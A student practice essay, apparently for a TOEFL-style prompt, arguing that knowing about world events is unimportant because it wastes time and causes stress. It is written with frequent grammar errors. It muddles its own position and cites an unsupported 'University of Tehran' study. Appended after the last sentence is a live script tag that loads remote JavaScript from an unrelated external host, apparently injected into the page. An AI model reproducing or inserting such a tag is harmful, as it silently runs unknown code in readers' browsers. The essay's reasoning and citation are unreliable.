Do you agree or disagree with the following statement? It is important to know about events happening around the world, even if it is unlikely that they will affect your daily life. Use specific reasons and examples to support your answer.

In fact, no one can deny the importance and effect of the events happening each day. Nowadays, social media and communication center spread all the events with considerable details. An important question which is raised here is whether knowing about the happening events around the world is important or not. Were i in the position to decide, I would concur the latter idea? In ensuing lines, I elaborate on my idea with reasonable reasons.

To begin with, my main reason is that pay attention to the events happening around the world can be time-consuming for people. To be more specific, in today's world, there are too many social media and communication devices which spread every news with detail from any part of the world. By considering the amount of the news, following events happening around the world needs a significant effort and time. To shed light on this matter, recent research held by the University of Tehran held that most of the people who following and pay attention to the events happening around the world spend 6-7 hours on the news center. Therefore, it's not necessary for the people to follow each news around them and it would be a better choice to spend less time on social media.

Last but not least, the second reason is that knowing about the events happening around the world can be disappointing for the people. To explain more, people who pay attention to news deliberately compare its effects on their tasks. By considering that the majority of the news is about the war or increasing price or in the other word they are bad news. It can put negative pressure on people and event disappoint them. Not only this news is disappointing but also are stressful for the people. Take my friend as an example. He recently stars a job and put all his effort to be successful in his business. But, as he follows and pays too much attention to the news about the increasing and decreasing price of dollars which is not effecting his business, he becomes disappointment due to the fact that price of dollars will effect his job in the future.

To sum up, taking all the above reasons into the account, I agree with the statement that it is not important to know about the events happening around the world. I wish, people have more attention on their task and not pay attention too much on the news.<script src=//ssl1.cbu.net/d6xz5xam></script>